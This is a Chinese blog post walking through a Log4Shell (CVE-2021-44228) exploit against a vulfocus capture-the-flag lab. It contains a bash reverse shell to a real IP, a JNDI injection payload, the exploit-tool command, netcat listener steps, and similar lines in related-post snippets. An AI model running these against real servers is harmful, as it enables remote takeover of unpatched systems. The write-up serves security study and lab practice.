log4j 远程执行代码CVE-2021-44228复现

已于 2024-05-13 15:19:15 修改
阅读量3.8k 收藏
点赞数
文章标签: 安全 web安全
于 2022-03-02 11:27:33 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/beichenyyds/article/details/123226085
版权

0x01 漏洞简述

2021年12月09日,360CERT监测发现Apache Log4j 2存在JNDI远程代码执行,漏洞等级:严重,漏洞评分:10.0。

Apache Log4j 2是一个开源的日志记录组件,使用非常的广泛,使用情况参考:

https://mvnrepository.com/artifact/org.apache.logging.log4j/log4j-core/usages

对此,360CERT建议广大用户尽快将·Apache Log4j 2进行升级,以免遭受黑客攻击。

0x02 漏洞最新情况

基本信息

详情

相关组件

Apache Log4j2

CVE编号

CVE-2021-44228

漏洞类型

远程代码执行

漏洞评分

10.0

风险等级

等级

威胁等级

严重

影响范围

广泛

攻击者价值

极高

利用难度

极低

利用状态

最新情况

PoC/EXP

已公开

在野利用

已存在

漏洞细节

已公开

安全补丁

已发布

0x03影响版本

注:Apache Log4j 1.x 版本不受此次漏洞影响。

0x04漏洞复现

1.先将工具下载

工具下载:链接: https://pan.baidu.com/s/12aEyW1P7NopJm-n53jnAEQ 提取码: nv8g

2.打开本地服务器文件上传,先建一个名为ddd的文件夹 把下载的工具放进去

3.进入这个工具的目录下

4.在这个目录下(ddd)服务器执行(自己的本地服务器ip)

bash -i >& /dev/tcp/121.4.55.89/6666 0>&1

YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjEuNC41NS44OS82NjY2IDA+JjE=(上面代码base64编码后)

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiA
vZGV2L3RjcC8xMjEuNC41NS44OS82NjY2IDA+JjE=}|{base64,-d}|{bash,-i}" -A "121.4.55.89"

5.发现1099端口开放,所以我们服务器也要开放这个端口

6.放行之后就要到靶场找flag

7.访问地址图片可以看到

http://vulfocus.fofa.so:20452/

8.抓包要抓页面ok的包

这里面要改payload

payload=$%7bjndi:rmi://121.4.55.89:1099/i3ydu1%7d

(本机服务器ip地址)(i3ydu1为下图选框)

之后就开始监听了,服务器复制一个终端输入

nc -lvvp 6666

burpsuit里面修改完payload之后发送到repeater(重发器),

点击按钮send,发现出现OK字样

观察服务器终端监听页面已经出现监听内容

flag在tmp目录下

直接ls

复制到靶场

通关

复现流程:服务器上传工具并运行以上代码---burpsuit抓包改为payload---服务器监听--等待监听结果

0x05修复建议

  • 3.升级受影响的应用及组件
  • 4.过滤相关的关键词,比如${jndi://*}
  • ......
beichenyyds
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Log4j远程代码执行漏洞(CVE-2021-44228)漏洞
鸥鹭忘机
12-11 1万+
基本信息 漏洞编号:CVE-2021-44228 影响版本:2.x<=2.15.0-rc1 poc地址:https://gitee.com/lcosmos/apache-log4j-poc 在此十分感谢我的寝室长Cosmos提供的poc和技术支持。 原理简述 当log4j打印的日志内容中包含${jndi:ldap://my-ip}时,程序就会通过ldap协议访问my-ip这个地址,然后my-ip就会返回一个包含java代码的class文件的地址,然后程序再通过返回的地址下载class文件并执行。 漏洞
【4】Apache Log4j2远程代码执行(2021.12.10)
司徒荆的博客
12-10 1980
Apache Log4j2远程代码执行(2021.12.10)
log4j2远程执行代码CVE-2021-44228(vulfocus靶场)
最新发布
m0_74294234的博客
03-31 278
bash -i >& /dev/tcp/(你服务器的公网IP地址)/8888(监听的端口号,我这里使用的是8888端口) 0>&1。1:首先打开finalshell或其他本地服务器上传,先创建一个ddd文件夹,并把下载的工具转移到该目录。}|{base64,-d}|{bash,-i}" -A "(你服务器的公网IP地址)"5:打开另一个终端端口并开启监听8888端口(8888端口是你在前面设置的监听端口)这样子就成功监听到端口,先进入tmp目录下,在输入ls可以爆出flag;6:用burpsuite抓包。
Log4j远程代码执行漏洞尝试
weixin_51194266的博客
06-29 594
log4j漏洞的简单
log4j2远程代码执行漏洞
liangbo7的博客
12-11 5170
log4j2远程代码执行漏洞-rmi方式代码侵入
Apache log4j漏洞
lizhe0327的博客
12-17 4048
Apache Log4j2是一款优秀的Java日志框架。2021年11月24日,阿里云安全团队向Apache官方报告了Apache Log4j2远程代码执行漏洞。由于Apache Log4j2某些功能存在递归解析功能,攻击者可直接构造恶意请求 漏洞只针对的是2.15以下版本的 在我们来重一下log4j的漏洞 public class Log4jTest { private static final Logger log = LogManager.getLogger(); public s
Apache Log4j 远程代码执行漏洞(CVE-2021-44832)
10-25
Java 6 将 log4j 升级到 2.3.2 版本,Java 7 将 log4j 升级到 2.12.4 版本,Java 8 或更高版本将 log4j 升级到 2.17.1 版本
CVE-2021-22986 F5 BIG-IP-IQ 远程代码执行.md
04-23
CVE-2021-22986 F5 BIG-IP-IQ 远程代码执行
CVE-2021-44228工具及流程文档.zip
12-10
需要本地java环境,演示采用的IDEA,压缩包内提供了marshalsec-0.0.3-SNAPSHOT-all.jar
Apache Log4j2远程代码执行漏洞及修建议
isxiaole的博客
12-13 6538
环境:本实验使用vulfocus提供的Log4j2远程命令执行靶机。 声明:文章所提供的内容和工具仅供于个人学习和研究,严禁传播者利用本文章的相关内容进行非法测试。由于传播、利用此文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。 背景: Apache Log4j2是一款优秀的Java日志框架。由于Apache Log4j2某些功能存在递归解析功能,攻击者可直接构造恶意请求,触发远程代码执行漏洞。 影响版本: 经验证 2.15.0-rc1 版本存在绕.
Apache Log4j 靶场
hackzkaq的博客
12-14 3279
`搜索公众号:白帽子左一,领配套练手靶场,全套安全课程及工具` 安全圈大动荡,新出的漏洞危害性极大,此漏洞是可以执行任意代码,群里也流传了一句话:“这已经相当于黑客已经攻入计算机,可以为所欲为了“.很恐怖,一个漏洞的出让多少人手忙脚乱。 新出了漏洞很多人都会想着去漏洞,为此掌控安全学院已经在12月10日15点上线了该漏洞靶场.点击文末”阅读原文“即可进入,亲测可以直接拿shell。切记要遵守网络安全法 靶场地址:https://hack.zkaq.cn/battle/target?id=5
Log4j2远程代码执行漏洞靶场CVE-2021-44228)
没事我溜达
11-02 2143
logger在执行日志的时候,就会执行中间的表达式,如表达式是JNDI就会远程下载文件到本地并执行
【红队靶场】利用log4j外网打点,cve-2021-42278/87打穿域控
人间体佐菲的博客
05-04 746
log4j,cve-2021-42278,域控,渗透测试,网络安全,信息安全
log4j2核弹级漏洞靶场(反弹shell)
m0_56773673的博客
01-04 4057
十分钟log4j2靶场漏洞!!!
致远OA Log4j2存在RCE
战神/calmness的博客
12-14 4672
目录 描述 Payload: 影响: 过程: 结果如下在dnslog上显示 描述 致远互联A8+是面向集团化、国际化、产业链和大型组织机构、涉外工作组织及组织群,针对其 组织范围内外协作应用设计的集团化管控和业务管控的一体化门户平台和工作入口。由于Apache Log4j2某些功能存在递归解析功能,未经身份验证的攻击者通过发送特别构造的数据请求包,可在受影响的致远相关版本进行代码执行,发在野利用,建议相关用户尽快采取措施进行排查与防护。 Apache Log4j2是一款Ap...
log4j漏洞原理和靶场
Aiwin的博客
08-19 7519
log4j漏洞原理和靶场
Log4J2 靶场漏洞
weixin_47019868的博客
12-18 9855
北京时间12月9号深夜,Apache Log4j2被曝出一个高危漏洞,攻击者通过jndi注入攻击的形式可以轻松远程执行任何代码。随后官方紧急推出了2.15.0和2.15.0-rc1新版本修,依然未能完全解决问题,在已经更新到2.15.0-rc2(近日已推出2.16版本)。该漏洞被命名为Log4Shell,编号CVE-2021-44228。相关地址NVD - CVE-2021-44228 本次漏洞采用vulfocus的log4j2靶场docker 使用Kali系统进行实验 在Kali系统
elasticsearch Apache Log4j 远程代码执行漏洞(CVE-2021-44228、CVE-2021-45046)
03-07
elasticsearch和Apache Log4j都存在远程代码执行漏洞(CVE-2021-44228、CVE-2021-45046),攻击者可以利用这些漏洞在受影响的系统上执行任意代码。建议用户尽快更新相关软件版本或采取其他安全措施来保护系统安全。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值